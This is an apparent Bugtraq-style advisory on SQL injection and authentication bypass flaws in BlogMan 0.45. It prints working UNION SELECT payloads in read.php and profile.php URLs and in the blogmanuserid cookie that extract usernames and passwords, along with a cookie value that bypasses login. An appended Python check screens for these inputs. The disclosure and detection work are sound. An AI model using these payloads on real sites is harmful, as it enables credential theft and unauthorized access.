BlogMan Multiple Input Validation Vulnerabilities
-\\Bugtraq ID: 33950
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 02 2009 12:00AM
-\\Updated: Mar 04 2009 05:16PM
-\\Credit: Salvatore 'drosophila' Fresta
-\\Vulnerable: Fahim A. Farook BlogMan 0.45
-\\Discussion: BlogMan is prone to multiple input-validation vulnerabilities:
- Multiple SQL-injection vulnerabilities
- An authentication-bypass vulnerability
A successful exploit may allow an attacker to compromise the application, gain unauthorized access to the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BlogMan 0.45 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit these issues.
The following example URIs and cookie data are available:
Name: blogmanuserid
Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user#
Server: target_server (example: localhost)
Path: /blogman/

http://www.example.com/path/read.php?id=-1'UNION ALL SELECT NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
http://www.example.com/path/profile.php?id=-1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user%23

Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/

Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
-\\Solution: Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
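Added example (not part of the advisory and not BlogMan's own code): a Python screening check for the inputs the advisory names, the id parameter of read.php and profile.php and the blogmanuserid cookie, which flags any value that is not a plain integer. The integer-only rule, the function names and the sample requests in the comments are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Inputs the advisory lists as injection points.
ID_PAGES = {"read.php", "profile.php"}      # query parameter: id
COOKIE_NAME = "blogmanuserid"
# Assumption: legitimate ids are plain non-negative integers.
NUMERIC = re.compile(r"[0-9]{1,10}")


def parse_cookies(header):
    """Split a Cookie header by hand so values containing quotes and
    spaces are kept for inspection instead of being dropped."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = unquote_plus(value)
    return cookies


def check_request(url, cookie_header=""):
    """Return (location, decoded value) pairs that are not plain integers."""
    findings = []
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1]
    if page in ID_PAGES:
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == "id" and not NUMERIC.fullmatch(value):
                findings.append((f"{page}?id", value))
    value = parse_cookies(cookie_header).get(COOKIE_NAME)
    if value is not None and not NUMERIC.fullmatch(value):
        findings.append((f"cookie:{COOKIE_NAME}", value))
    return findings


# Constructed sample requests (shortened, not real log data):
#   check_request("/blogman/read.php?id=7", "blogmanuserid=3")
#   check_request("/blogman/read.php?id=-1'UNION ALL SELECT NULL,2 FROM user%23")
#   check_request("/blogman/index.php", "blogmanuserid=-1' UNION ALL SELECT 1,2,3#")
#
# Limitation: a cookie value such as 1 (the advisory's authentication-bypass
# example) is syntactically valid and passes this check. Input validation
# covers only the SQL-injection issues, not the authentication bypass.
```

The same integer-only rule can be enforced in front of the application (reverse proxy or WAF) or applied to stored access logs to find earlier attempts.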
-\\Reference(s):
- BlogMan Homepage http://farook.org/BlogMan.ht (Fahim A. Farook)